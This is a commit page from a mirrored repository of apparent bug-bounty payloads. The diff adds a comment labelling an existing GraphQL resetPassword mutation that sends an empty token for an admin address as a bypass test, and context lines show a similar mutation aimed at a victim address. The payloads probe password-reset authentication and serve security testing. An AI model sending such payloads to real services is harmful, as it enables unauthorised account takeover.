mirror of
https://github.com/0x5t4l1n/hunting.git
synced 2026-05-26 19:36:33 +00:00
Add clarification comment for empty token GraphQL mutation test
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
This commit is contained in:
@@ -331,6 +331,7 @@ current_step=final
|
||||
|
||||
# GraphQL mutations
|
||||
{"query":"mutation{resetPassword(email:\"victim@example.com\"){success}}"}
|
||||
# GraphQL mutation with empty token (testing bypass)
|
||||
{"query":"mutation{resetPassword(email:\"admin@example.com\",token:\"\"){success}}"}
|
||||
|
||||
# REST API variations
|
||||
|
||||
Reference in New Issue
Block a user